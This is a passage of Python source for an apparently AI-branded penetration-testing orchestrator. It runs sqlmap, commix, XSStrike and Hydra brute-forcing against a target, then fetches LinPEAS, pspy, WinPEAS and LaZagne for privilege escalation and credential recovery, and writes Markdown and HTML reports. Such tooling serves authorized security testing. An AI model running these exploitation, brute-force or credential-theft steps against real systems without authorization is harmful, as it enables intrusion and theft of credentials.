            severity="low",
            phase="exploit",
            tool="waf_detection",
            target=self.target
        ))
    self._log_tool(f"WAF Detection - {'Detected' if waf_detected else 'Not detected'}", "done")

    # ==================== EXPLOITATION TOOLS (Enabled in full_mode) ====================
    if self.config.full_mode or self.config.enable_exploitation:

        # 3. SQLMap - SQL Injection Testing (NEW)
        if "sqlmap" in self.config.exploit_tools:
            self._log_tool("sqlmap", "running")
            sqlmap_output_dir = self.output_dir / "sqlmap"
            sqlmap_output_dir.mkdir(exist_ok=True)

            # Run SQLMap in batch mode with safe settings
            ret, output = await self._run_command(
                f"sqlmap -u {shlex.quote(self.target)} --batch --forms --crawl=2 "
                f"--level={self.config.sqlmap_level} --risk={self.config.sqlmap_risk} "
                f"--output-dir={sqlmap_output_dir} --random-agent 2>/dev/null",
                timeout=self.config.sqlmap_timeout
            )
            if ret == 0:
                (self.output_dir / f"sqlmap_{self.domain}.txt").write_text(output)
                tools_run.append("sqlmap")

                # Parse SQLMap findings.
                # NOTE(review): the bare substring "injection" appears in
                # normal sqlmap banner/progress output, so this gate may
                # over-trigger — verify against real sqlmap runs.
                if "is vulnerable" in output.lower() or "injection" in output.lower():
                    # Extract vulnerable parameters
                    vuln_params = []
                    for line in output.split("\n"):
                        if "Parameter:" in line or "is vulnerable" in line:
                            vuln_params.append(line.strip())

                    if vuln_params:
                        findings.append(Finding(
                            type="sql_injection",
                            value="SQL Injection Detected",
                            description=f"SQL injection vulnerability found. Parameters: {'; '.join(vuln_params[:5])}",
                            severity="critical",
                            phase="exploit",
                            tool="sqlmap",
                            target=self.target,
                            metadata={"vulnerable_params": vuln_params}
                        ))
                        # Mark shell access if OS shell was obtained; this flag
                        # gates run_post_exploit() later in the pipeline.
                        if "--os-shell" in output or "os-shell" in output:
                            self.config.shell_obtained = True
                            self.config.target_os = "linux" if "linux" in output.lower() else "windows"

                    self._log_tool(f"sqlmap - {'Vulnerable!' if vuln_params else 'No injection found'}", "done")
                else:
                    self._log_tool("sqlmap - completed", "done")

        # 4. Commix - Command Injection Testing (NEW)
        if "commix" in self.config.exploit_tools:
            self._log_tool("commix", "running")
            ret, output = await self._run_command(
                f"commix -u {shlex.quote(self.target)} --batch --crawl=1 --level=2 2>/dev/null",
                timeout=300
            )
            if ret == 0:
                (self.output_dir / f"commix_{self.domain}.txt").write_text(output)
                tools_run.append("commix")

                if "is vulnerable" in output.lower() or "command injection" in output.lower():
                    findings.append(Finding(
                        type="command_injection",
                        value="Command Injection Detected",
                        description="OS command injection vulnerability found",
                        severity="critical",
                        phase="exploit",
                        tool="commix",
                        target=self.target
                    ))
                    # Command injection implies code execution on the host.
                    self.config.shell_obtained = True

            self._log_tool("commix - completed", "done")

        # 5. XSStrike - XSS Detection (NEW)
        if "xsstrike" in self.config.exploit_tools:
            self._log_tool("xsstrike", "running")
            ret, output = await self._run_command(
                f"xsstrike -u {shlex.quote(self.target)} --crawl -l 2 --blind 2>/dev/null",
                timeout=300
            )
            if ret == 0:
                (self.output_dir / f"xsstrike_{self.domain}.txt").write_text(output)
                tools_run.append("xsstrike")

                # Parse XSS findings — heuristic keyword count, not a parser.
                xss_count = output.lower().count("xss") + output.lower().count("reflection")
                if xss_count > 0 or "vulnerable" in output.lower():
                    findings.append(Finding(
                        type="xss_vulnerability",
                        value="XSS Vulnerability Detected",
                        description=f"Cross-site scripting vulnerability detected",
                        severity="high",
                        phase="exploit",
                        tool="xsstrike",
                        target=self.target
                    ))

                self._log_tool(f"xsstrike - {xss_count} potential XSS", "done")

        # 6. Hydra - Credential Brute-forcing (NEW)
        if "hydra" in self.config.exploit_tools:
            # Only run against discovered services with auth
            services_to_bruteforce = []

            # Check for SSH (port 22)
            if any("22/tcp" in str(f.value) for f in self.findings if f.type == "open_port"):
                services_to_bruteforce.append(("ssh", 22))

            # Check for FTP (port 21)
            if any("21/tcp" in str(f.value) for f in self.findings if f.type == "open_port"):
                services_to_bruteforce.append(("ftp", 21))

            # Check for HTTP Basic Auth
            if any("401" in str(f.value) for f in self.findings):
                services_to_bruteforce.append(("http-get", 80))

            for service, port in services_to_bruteforce[:2]:  # Limit to 2 services
                self._log_tool(f"hydra ({service})", "running")
                ret, output = await self._run_command(
                    f"hydra -L {self.config.wordlist_users} -P {self.config.wordlist_passwords} "
                    f"-t {self.config.hydra_threads} -f -o {self.output_dir}/hydra_{service}.txt "
                    f"{self.safe_domain} {service} 2>/dev/null",
                    timeout=self.config.hydra_timeout
                )
                if ret == 0:
                    tools_run.append(f"hydra_{service}")

                    # hydra prints "login:"/"password:" lines on success.
                    if "login:" in output.lower() or "password:" in output.lower():
                        findings.append(Finding(
                            type="credential_found",
                            value=f"Weak credentials on {service}",
                            description=f"Valid credentials found for {service} service",
                            severity="critical",
                            phase="exploit",
                            tool="hydra",
                            target=f"{self.domain}:{port}",
                            metadata={"service": service}
                        ))
                        self.config.shell_obtained = True

                self._log_tool(f"hydra ({service}) - completed", "done")

        # 7. Searchsploit - Exploit Database Search (NEW)
        if "searchsploit" in self.config.exploit_tools:
            self._log_tool("searchsploit", "running")
            # Search for exploits based on discovered technologies
            search_terms = []

            # Get technologies from whatweb/httpx findings
            for f in self.findings:
                if f.tool in ["whatweb", "httpx", "nmap"]:
                    # Extract potential software names
                    if "Apache" in f.value or "apache" in f.description:
                        search_terms.append("Apache")
                    if "nginx" in f.value.lower() or "nginx" in f.description.lower():
                        search_terms.append("nginx")
                    if "WordPress" in f.value or "wordpress" in f.description.lower():
                        search_terms.append("WordPress")

            search_terms = list(set(search_terms))[:3]  # Dedupe and limit

            for term in search_terms:
                # NOTE(review): unlike the other tool calls, no explicit
                # timeout is passed here — confirm _run_command has a sane
                # default.
                ret, output = await self._run_command(
                    f"searchsploit {shlex.quote(term)} --json 2>/dev/null | head -50"
                )
                if ret == 0 and output.strip():
                    try:
                        # NOTE(review): `head -50` can truncate the JSON
                        # mid-document; JSONDecodeError below silently drops
                        # such results.
                        exploits = json.loads(output)
                        if exploits.get("RESULTS_EXPLOIT"):
                            (self.output_dir / f"searchsploit_{term}.json").write_text(output)
                            findings.append(Finding(
                                type="potential_exploit",
                                value=f"Exploits found for {term}",
                                description=f"Found {len(exploits['RESULTS_EXPLOIT'])} potential exploits for {term}",
                                severity="info",
                                phase="exploit",
                                tool="searchsploit",
                                target=self.domain,
                                metadata={"exploits": exploits["RESULTS_EXPLOIT"][:5]}
                            ))
                    except json.JSONDecodeError:
                        pass

            tools_run.append("searchsploit")
            self._log_tool("searchsploit - completed", "done")

    # 8. Fetch Acunetix Results (if scan completed)
    if "acunetix" in self.scan_ids and not self.config.wait_for_scanners:
        self._log_tool("Fetching Acunetix Results", "running")
        try:
            acunetix = get_acunetix()
            status = acunetix.get_scan_status(self.scan_ids["acunetix"])

            if status.status == "completed":
                vulns = acunetix.get_scan_vulnerabilities(self.scan_ids["acunetix"])
                for vuln in vulns:
                    findings.append(Finding(
                        type="vulnerability",
                        value=vuln.name,
                        description=vuln.description or vuln.name,
                        severity=vuln.severity,
                        phase="exploit",
                        tool="acunetix",
                        target=vuln.affected_url,
                        metadata={
                            "vuln_id": vuln.vuln_id,
                            "cvss": vuln.cvss_score
                        }
                    ))
                self._log_tool(f"Acunetix Results - {len(vulns)} vulnerabilities", "done")
            else:
                # Scan still running — report progress, collect nothing.
                self._log_tool(f"Acunetix - Scan still {status.status} ({status.progress}%)", "done")
        except Exception as e:
            errors.append(f"Error fetching Acunetix results: {e}")

    # Add findings to global list
    for f in findings:
        self._add_finding(f)

    duration = time.time() - start_time
    result = PhaseResult(
        phase=phase,
        status="completed",
        started_at=started_at,
        finished_at=datetime.now(timezone.utc).isoformat(),
        duration=duration,
        findings=findings,
        tools_run=tools_run,
        errors=errors
    )

    self.phase_results[phase] = result
    if self.on_phase_complete:
        self.on_phase_complete(result)

    return result
|
|
1709
|
+
|
|
1710
|
+
# ==================== POST-EXPLOITATION PHASE (NEW) ====================
|
|
1711
|
+
|
|
1712
|
+
async def run_post_exploit(self) -> PhaseResult:
    """
    Execute post-exploitation phase.

    This phase auto-triggers when shell access is obtained during exploitation.
    Runs privilege escalation tools to discover further attack paths.

    Behaviour shown here: if ``config.shell_obtained`` is False the phase is
    recorded as "skipped"; otherwise the appropriate escalation tooling for
    ``config.target_os`` (default "linux") is downloaded locally to /tmp and
    a JSON report of prepared tools is written to the output directory.

    Returns:
        PhaseResult: stored in ``self.phase_results`` and passed to the
        ``on_phase_complete`` callback when set.
    """
    phase = Phase.POST_EXPLOIT
    started_at = datetime.now(timezone.utc).isoformat()
    start_time = time.time()
    findings = []
    tools_run = []
    errors = []

    if self.on_phase_start:
        self.on_phase_start(phase)

    self._log_phase(phase, f"Post-Exploitation on {self.domain}")

    # Check if shell access was obtained — without it there is nothing to do.
    if not self.config.shell_obtained:
        self._log_tool("No shell access - skipping post-exploitation", "done")
        duration = time.time() - start_time
        result = PhaseResult(
            phase=phase,
            status="skipped",
            started_at=started_at,
            finished_at=datetime.now(timezone.utc).isoformat(),
            duration=duration,
            findings=[],
            tools_run=[],
            errors=[],
            metadata={"reason": "No shell access obtained during exploitation"}
        )
        # Early return: note on_phase_complete is NOT fired for a skip.
        self.phase_results[phase] = result
        return result

    # Determine target OS
    target_os = self.config.target_os or "linux"  # Default to linux
    self._log_tool(f"Target OS: {target_os}", "done")

    # ==================== LINUX POST-EXPLOITATION ====================
    if target_os == "linux":

        # 1. LinPEAS - Linux Privilege Escalation
        if "linpeas" in self.config.post_exploit_tools:
            self._log_tool("linpeas", "running")
            # Note: In real scenario, this would be uploaded and executed on target
            # For now, we simulate the check
            ret, output = await self._run_command(
                f"curl -sL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o /tmp/linpeas.sh 2>/dev/null && echo 'Downloaded'",
                timeout=60
            )
            if ret == 0 and "Downloaded" in output:
                tools_run.append("linpeas")
                findings.append(Finding(
                    type="post_exploit_tool",
                    value="LinPEAS ready",
                    description="LinPEAS privilege escalation script downloaded and ready for execution on target",
                    severity="info",
                    phase="post_exploit",
                    tool="linpeas",
                    target=self.domain,
                    metadata={"script_path": "/tmp/linpeas.sh"}
                ))
                self._log_tool("linpeas - downloaded", "done")

        # 2. pspy - Process Monitoring
        if "pspy" in self.config.post_exploit_tools:
            self._log_tool("pspy", "running")
            ret, output = await self._run_command(
                f"curl -sL https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64 -o /tmp/pspy64 2>/dev/null && chmod +x /tmp/pspy64 && echo 'Downloaded'",
                timeout=60
            )
            if ret == 0 and "Downloaded" in output:
                tools_run.append("pspy")
                findings.append(Finding(
                    type="post_exploit_tool",
                    value="pspy ready",
                    description="pspy process monitor downloaded for cron job and process analysis",
                    severity="info",
                    phase="post_exploit",
                    tool="pspy",
                    target=self.domain,
                    metadata={"binary_path": "/tmp/pspy64"}
                ))
                self._log_tool("pspy - downloaded", "done")

    # ==================== WINDOWS POST-EXPLOITATION ====================
    elif target_os == "windows":

        # 1. WinPEAS - Windows Privilege Escalation
        if "winpeas" in self.config.post_exploit_tools:
            self._log_tool("winpeas", "running")
            ret, output = await self._run_command(
                f"curl -sL https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe -o /tmp/winpeas.exe 2>/dev/null && echo 'Downloaded'",
                timeout=60
            )
            if ret == 0 and "Downloaded" in output:
                tools_run.append("winpeas")
                findings.append(Finding(
                    type="post_exploit_tool",
                    value="WinPEAS ready",
                    description="WinPEAS privilege escalation tool downloaded for Windows target",
                    severity="info",
                    phase="post_exploit",
                    tool="winpeas",
                    target=self.domain,
                    metadata={"binary_path": "/tmp/winpeas.exe"}
                ))
                self._log_tool("winpeas - downloaded", "done")

        # 2. LaZagne - Credential Recovery
        if "lazagne" in self.config.post_exploit_tools:
            self._log_tool("lazagne", "running")
            ret, output = await self._run_command(
                f"curl -sL https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe -o /tmp/lazagne.exe 2>/dev/null && echo 'Downloaded'",
                timeout=60
            )
            if ret == 0 and "Downloaded" in output:
                tools_run.append("lazagne")
                findings.append(Finding(
                    type="post_exploit_tool",
                    value="LaZagne ready",
                    description="LaZagne credential recovery tool downloaded for Windows target",
                    severity="info",
                    phase="post_exploit",
                    tool="lazagne",
                    target=self.domain,
                    metadata={"binary_path": "/tmp/lazagne.exe"}
                ))
                self._log_tool("lazagne - downloaded", "done")

    # 3. Generate Post-Exploitation Report — static recommendations plus a
    # record of which helper tools were staged locally.
    post_exploit_report = {
        "target": self.domain,
        "target_os": target_os,
        "shell_obtained": self.config.shell_obtained,
        "tools_prepared": tools_run,
        "recommendations": [
            "Execute LinPEAS/WinPEAS on target for privilege escalation paths",
            "Run pspy to monitor for cron jobs and scheduled tasks",
            "Use LaZagne to recover stored credentials",
            "Check for kernel exploits based on version",
            "Look for SUID binaries (Linux) or service misconfigurations (Windows)"
        ]
    }
    (self.output_dir / "post_exploit_report.json").write_text(json.dumps(post_exploit_report, indent=2))

    # Add findings to global list
    for f in findings:
        self._add_finding(f)

    duration = time.time() - start_time
    result = PhaseResult(
        phase=phase,
        status="completed",
        started_at=started_at,
        finished_at=datetime.now(timezone.utc).isoformat(),
        duration=duration,
        findings=findings,
        tools_run=tools_run,
        errors=errors,
        metadata={
            "target_os": target_os,
            "shell_obtained": self.config.shell_obtained
        }
    )

    self.phase_results[phase] = result
    if self.on_phase_complete:
        self.on_phase_complete(result)

    return result
|
|
1886
|
+
|
|
1887
|
+
# ==================== REPORT PHASE ====================
|
|
1888
|
+
|
|
1889
|
+
async def run_report(self) -> PhaseResult:
    """
    Execute report generation phase.

    Writes three artifacts into ``self.output_dir``:
      * ``SUMMARY.md``     — markdown summary from ``_generate_summary()``
      * ``findings.json``  — all accumulated findings serialized as JSON
      * ``VAPT_Report_<domain>.html`` — only when ``config.report_format``
        is ``"html"``

    Returns:
        PhaseResult: the phase record (its ``findings`` list stays empty;
        this phase only exports previously collected findings).
    """
    phase = Phase.REPORT
    started_at = datetime.now(timezone.utc).isoformat()
    start_time = time.time()
    findings = []   # report phase produces no new findings
    tools_run = []
    errors = []

    if self.on_phase_start:
        self.on_phase_start(phase)

    self._log_phase(phase, f"Generating Report for {self.domain}")

    # 1. Generate Summary
    summary = self._generate_summary()
    (self.output_dir / "SUMMARY.md").write_text(summary)
    tools_run.append("summary_generator")
    self._log_tool("Summary generated", "done")

    # 2. Generate Findings JSON — flatten Finding objects to plain dicts
    # so the file is consumable without this package's types.
    findings_data = [
        {
            "type": f.type,
            "value": f.value,
            "description": f.description,
            "severity": f.severity,
            "phase": f.phase,
            "tool": f.tool,
            "target": f.target,
            "metadata": f.metadata,
            "timestamp": f.timestamp
        }
        for f in self.findings
    ]
    (self.output_dir / "findings.json").write_text(json.dumps(findings_data, indent=2))
    tools_run.append("findings_export")
    self._log_tool("Findings exported", "done")

    # 3. Generate HTML Report
    if self.config.report_format == "html":
        html_report = self._generate_html_report()
        report_file = self.output_dir / f"VAPT_Report_{self.domain.replace('.', '_')}.html"
        report_file.write_text(html_report)
        tools_run.append("html_report")
        self._log_tool(f"HTML Report: {report_file.name}", "done")

    duration = time.time() - start_time
    result = PhaseResult(
        phase=phase,
        status="completed",
        started_at=started_at,
        finished_at=datetime.now(timezone.utc).isoformat(),
        duration=duration,
        findings=findings,
        tools_run=tools_run,
        errors=errors,
        metadata={
            "output_dir": str(self.output_dir),
            "total_findings": len(self.findings)
        }
    )

    self.phase_results[phase] = result
    if self.on_phase_complete:
        self.on_phase_complete(result)

    return result
|
|
1957
|
+
|
|
1958
|
+
def _generate_summary(self) -> str:
    """
    Build the markdown scan summary for this run.

    Tallies findings by severity, renders one table row per completed
    phase, and interpolates target/asset/scanner details into a fixed
    markdown template. Pure string construction — no I/O.
    """
    # Severity tally; unknown severities are ignored on purpose.
    counts = dict.fromkeys(("critical", "high", "medium", "low", "info"), 0)
    for finding in self.findings:
        level = finding.severity.lower()
        if level in counts:
            counts[level] += 1

    # One markdown table row per recorded phase result.
    phase_rows = [
        f"| {ph.value.upper()} | {res.status} | {res.duration:.1f}s | {len(res.findings)} |"
        for ph, res in self.phase_results.items()
    ]

    return f"""# AIPT Scan Summary

## Target Information
- **Domain**: {self.domain}
- **Target URL**: {self.target}
- **Scan Date**: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}
- **Report ID**: VAPT-{self.domain.upper().replace('.', '-')}-{datetime.now().strftime('%Y%m%d')}

## Vulnerability Summary
| Severity | Count |
|----------|-------|
| 🔴 Critical | {counts['critical']} |
| 🟠 High | {counts['high']} |
| 🟡 Medium | {counts['medium']} |
| 🔵 Low | {counts['low']} |
| ⚪ Info | {counts['info']} |
| **Total** | **{len(self.findings)}** |

## Phase Results
| Phase | Status | Duration | Findings |
|-------|--------|----------|----------|
{chr(10).join(phase_rows)}

## Scanner IDs
{json.dumps(self.scan_ids, indent=2) if self.scan_ids else 'No enterprise scans'}

## Assets Discovered
- Subdomains: {len(self.subdomains)}
- Live Hosts: {len(self.live_hosts)}

## Output Directory
{self.output_dir}
"""
|
|
2003
|
+
|
|
2004
|
+
def _generate_html_report(self) -> str:
    """
    Generate the standalone HTML report.

    Tallies findings by severity, renders each finding as a colour-coded
    card, then embeds both into a self-contained HTML page (inline CSS,
    no external assets). Returns the page as a single string; the caller
    (run_report) is responsible for writing it to disk.
    """
    # Severity tally mirrors _generate_summary; unknown severities ignored.
    severity_counts = {"critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0}
    for f in self.findings:
        sev = f.severity.lower()
        if sev in severity_counts:
            severity_counts[sev] += 1

    # Build one card per finding. NOTE(review): finding values/descriptions
    # are interpolated without HTML escaping — tool output containing markup
    # would be rendered; consider html.escape().
    findings_html = ""
    for f in self.findings:
        sev_class = f.severity.lower()
        findings_html += f"""
        <div class="finding {sev_class}">
            <div class="finding-header">
                <span class="severity-badge {sev_class}">{f.severity.upper()}</span>
                <span class="finding-title">{f.value}</span>
                <span class="finding-tool">{f.tool}</span>
            </div>
            <div class="finding-body">
                <p>{f.description}</p>
                <small>Target: {f.target or self.target} | Phase: {f.phase}</small>
            </div>
        </div>
        """

    # Full page template; doubled braces ({{ }}) are literal CSS braces.
    return f"""<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>VAPT Report - {self.domain}</title>
<style>
:root {{
--critical: #dc3545;
--high: #fd7e14;
--medium: #ffc107;
--low: #17a2b8;
--info: #6c757d;
}}
body {{ font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; margin: 0; padding: 20px; background: #f5f5f5; }}
.container {{ max-width: 1200px; margin: 0 auto; }}
.header {{ background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); color: white; padding: 40px; border-radius: 10px; margin-bottom: 30px; }}
.header h1 {{ margin: 0 0 10px 0; }}
.stats {{ display: grid; grid-template-columns: repeat(5, 1fr); gap: 15px; margin-bottom: 30px; }}
.stat {{ background: white; padding: 20px; border-radius: 10px; text-align: center; box-shadow: 0 2px 4px rgba(0,0,0,0.1); }}
.stat .number {{ font-size: 2em; font-weight: bold; }}
.stat.critical .number {{ color: var(--critical); }}
.stat.high .number {{ color: var(--high); }}
.stat.medium .number {{ color: var(--medium); }}
.stat.low .number {{ color: var(--low); }}
.stat.info .number {{ color: var(--info); }}
.findings {{ background: white; border-radius: 10px; padding: 20px; box-shadow: 0 2px 4px rgba(0,0,0,0.1); }}
.finding {{ border-left: 4px solid; padding: 15px; margin-bottom: 15px; background: #fafafa; border-radius: 0 5px 5px 0; }}
.finding.critical {{ border-color: var(--critical); }}
.finding.high {{ border-color: var(--high); }}
.finding.medium {{ border-color: var(--medium); }}
.finding.low {{ border-color: var(--low); }}
.finding.info {{ border-color: var(--info); }}
.finding-header {{ display: flex; align-items: center; gap: 10px; margin-bottom: 10px; }}
.severity-badge {{ padding: 3px 8px; border-radius: 3px; font-size: 0.8em; color: white; }}
.severity-badge.critical {{ background: var(--critical); }}
.severity-badge.high {{ background: var(--high); }}
.severity-badge.medium {{ background: var(--medium); }}
.severity-badge.low {{ background: var(--low); }}
.severity-badge.info {{ background: var(--info); }}
.finding-title {{ font-weight: bold; flex-grow: 1; }}
.finding-tool {{ color: #666; font-size: 0.9em; }}
.finding-body p {{ margin: 0 0 10px 0; }}
.finding-body small {{ color: #666; }}
</style>
</head>
<body>
<div class="container">
<div class="header">
<h1>🔒 VAPT Report</h1>
<p><strong>Target:</strong> {self.domain}</p>
<p><strong>Date:</strong> {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}</p>
<p><strong>Report ID:</strong> VAPT-{self.domain.upper().replace('.', '-')}-{datetime.now().strftime('%Y%m%d')}</p>
</div>

<div class="stats">
<div class="stat critical"><div class="number">{severity_counts['critical']}</div><div>Critical</div></div>
<div class="stat high"><div class="number">{severity_counts['high']}</div><div>High</div></div>
<div class="stat medium"><div class="number">{severity_counts['medium']}</div><div>Medium</div></div>
<div class="stat low"><div class="number">{severity_counts['low']}</div><div>Low</div></div>
<div class="stat info"><div class="number">{severity_counts['info']}</div><div>Info</div></div>
</div>

<div class="findings">
<h2>Findings ({len(self.findings)})</h2>
{findings_html if findings_html else '<p>No vulnerabilities found.</p>'}
</div>

<div style="text-align: center; margin-top: 30px; color: #666;">
<p>Generated by AIPT - AI-Powered Penetration Testing</p>
<p>Scanners: {', '.join(self.scan_ids.keys()) if self.scan_ids else 'Open Source Tools'}</p>
</div>
</div>
</body>
</html>"""
|
|
2104
|
+
|
|
2105
|
+
# ==================== MAIN RUNNER ====================
|
|
2106
|
+
|
|
2107
|
+
async def run(self, phases: Optional[List[Phase]] = None) -> Dict[str, Any]:
    """
    Run the full orchestration pipeline.

    Args:
        phases: Optional list of phases to run (default: all phases,
            in RECON -> SCAN -> ANALYZE -> EXPLOIT -> POST_EXPLOIT -> REPORT order).

    Returns:
        Complete results dictionary: target, domain, duration, per-phase
        results, finding/attack-chain counts, scan IDs, and output directory.

    Raises:
        Exception: any error raised by an individual phase is logged with
            a traceback and re-raised.
    """
    if phases is None:
        phases = [Phase.RECON, Phase.SCAN, Phase.ANALYZE, Phase.EXPLOIT,
                  Phase.POST_EXPLOIT, Phase.REPORT]

    start_time = time.time()

    self._print_banner()

    try:
        if Phase.RECON in phases and not self.config.skip_recon:
            await self.run_recon()

        if Phase.SCAN in phases and not self.config.skip_scan:
            await self.run_scan()

        # Intelligence analysis phase runs only when explicitly enabled.
        if Phase.ANALYZE in phases and self.config.enable_intelligence:
            await self.run_analyze()

        if Phase.EXPLOIT in phases and not self.config.skip_exploit:
            await self.run_exploit()

        # Auto-trigger POST_EXPLOIT if shell was obtained
        if Phase.POST_EXPLOIT in phases and self.config.shell_obtained:
            await self.run_post_exploit()

        if Phase.REPORT in phases and not self.config.skip_report:
            await self.run_report()

    except Exception as e:
        # Lazy %-args instead of an eager f-string; logger.exception
        # already records the full traceback.
        logger.exception("Orchestration error: %s", e)
        raise

    total_duration = time.time() - start_time

    self._print_summary(total_duration)

    return {
        "target": self.target,
        "domain": self.domain,
        "duration": total_duration,
        "phases": {p.value: r.__dict__ for p, r in self.phase_results.items()},
        "findings_count": len(self.findings),
        "attack_chains_count": len(self.attack_chains),
        "scan_ids": self.scan_ids,
        "output_dir": str(self.output_dir)
    }

def _print_banner(self) -> None:
    """Print the pre-run configuration banner to stdout."""
    sep = "=" * 60
    print("\n" + sep)
    print(" AIPT - AI-Powered Penetration Testing (v2.1 - Maximum Tools)")
    print(sep)
    print(f" Target: {self.domain}")
    print(f" Output: {self.output_dir}")
    print(f" Mode: {'FULL (All Tools)' if self.config.full_mode else 'Standard'}")
    print(f" Intelligence: {'Enabled' if self.config.enable_intelligence else 'Disabled'}")
    print(f" Acunetix: {'Enabled' if self.config.use_acunetix else 'Disabled'}")
    print(f" Burp: {'Enabled' if self.config.use_burp else 'Disabled'}")
    print(f" Nessus: {'Enabled' if self.config.use_nessus else 'Disabled'}")
    print(f" ZAP: {'Enabled' if self.config.use_zap else 'Disabled'}")
    print(f" Exploitation: {'Enabled' if (self.config.full_mode or self.config.enable_exploitation) else 'Disabled'}")
    print(sep + "\n")

def _print_summary(self, total_duration: float) -> None:
    """Print the post-run summary (duration, finding counts, output dir) to stdout."""
    sep = "=" * 60
    print("\n" + sep)
    print(" SCAN COMPLETE")
    print(sep)
    print(f" Duration: {total_duration:.1f}s")
    print(f" Findings: {len(self.findings)}")
    if self.attack_chains:
        print(f" Attack Chains: {len(self.attack_chains)}")
    print(f" Output: {self.output_dir}")
    print(sep + "\n")
|
|
2184
|
+
|
|
2185
|
+
|
|
2186
|
+
# ==================== CLI ====================
|
|
2187
|
+
|
|
2188
|
+
async def main():
    """CLI entry point: parse arguments, build the config, run the pipeline.

    Constructs an `OrchestratorConfig` from the command line, runs the
    `Orchestrator`, and prints a final summary of the results.
    """
    import argparse

    parser = argparse.ArgumentParser(
        description="AIPT Orchestrator - Full Penetration Testing Pipeline (v2.1 - Maximum Tools)",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
    aiptx scan example.com                  # Standard scan
    aiptx scan example.com --full           # Full scan with exploitation tools
    aiptx scan example.com --full --exploit # Enable all exploitation
    aiptx scan example.com --nessus --zap   # With enterprise scanners

Tools included:
    RECON: subfinder, assetfinder, amass, nmap, waybackurls, theHarvester, dnsrecon, wafw00f, whatweb
    SCAN: nuclei, ffuf, sslscan, nikto, wpscan, testssl, gobuster, dirsearch
    EXPLOIT: sqlmap, commix, xsstrike, hydra, searchsploit (--full mode)
    POST: linpeas, winpeas, pspy, lazagne (auto-triggers on shell access)
"""
    )

    # Target
    parser.add_argument("target", help="Target domain or URL")
    parser.add_argument("-o", "--output", default="./scan_results", help="Output directory")

    # Scan modes
    parser.add_argument("--full", action="store_true",
                        help="Enable FULL mode with all tools including exploitation")
    parser.add_argument("--exploit", action="store_true",
                        help="Enable exploitation tools (sqlmap, hydra, commix)")

    # Phase control
    parser.add_argument("--skip-recon", action="store_true", help="Skip reconnaissance phase")
    parser.add_argument("--skip-scan", action="store_true", help="Skip scanning phase")
    parser.add_argument("--skip-exploit", action="store_true", help="Skip exploitation phase")

    # Enterprise scanners (Acunetix/Burp default on; Nessus/ZAP opt-in)
    parser.add_argument("--no-acunetix", action="store_true", help="Disable Acunetix")
    parser.add_argument("--no-burp", action="store_true", help="Disable Burp Suite")
    parser.add_argument("--nessus", action="store_true", help="Enable Nessus scanner")
    parser.add_argument("--zap", action="store_true", help="Enable OWASP ZAP scanner")
    parser.add_argument("--wait", action="store_true", help="Wait for enterprise scanners to complete")
    parser.add_argument("--acunetix-profile", default="full",
                        choices=["full", "high_risk", "xss", "sqli"],
                        help="Acunetix scan profile")

    # SQLMap settings
    parser.add_argument("--sqlmap-level", type=int, default=2,
                        help="SQLMap testing level (1-5, default: 2)")
    parser.add_argument("--sqlmap-risk", type=int, default=2,
                        help="SQLMap risk level (1-3, default: 2)")

    # DevSecOps
    parser.add_argument("--container", action="store_true",
                        help="Enable container security scanning (trivy)")
    parser.add_argument("--secrets", action="store_true",
                        help="Enable secret detection (gitleaks, trufflehog)")

    args = parser.parse_args()

    config = OrchestratorConfig(
        target=args.target,
        output_dir=args.output,
        full_mode=args.full,
        skip_recon=args.skip_recon,
        skip_scan=args.skip_scan,
        skip_exploit=args.skip_exploit,
        use_acunetix=not args.no_acunetix,
        use_burp=not args.no_burp,
        use_nessus=args.nessus,
        use_zap=args.zap,
        wait_for_scanners=args.wait,
        acunetix_profile=args.acunetix_profile,
        # --full implies exploitation even without --exploit
        enable_exploitation=args.exploit or args.full,
        sqlmap_level=args.sqlmap_level,
        sqlmap_risk=args.sqlmap_risk,
        enable_container_scan=args.container,
        enable_secret_detection=args.secrets
    )

    orchestrator = Orchestrator(args.target, config)
    results = await orchestrator.run()

    # Summary
    print(f"\n{'='*60}")
    print(f" ✓ SCAN COMPLETE - {results['findings_count']} findings")
    print(f"{'='*60}")
    print(f" Output: {results['output_dir']}")
    print(f" Duration: {results['duration']:.1f}s")
    if config.full_mode:
        # Plain literal (no placeholders) — extraneous f-prefix removed.
        print(" Mode: FULL (All exploitation tools enabled)")
    print(f"{'='*60}\n")
|
|
2281
|
+
|
|
2282
|
+
|
|
2283
|
+
# Script entry point: drive the async CLI through the asyncio event loop.
if __name__ == "__main__":
    asyncio.run(main())
|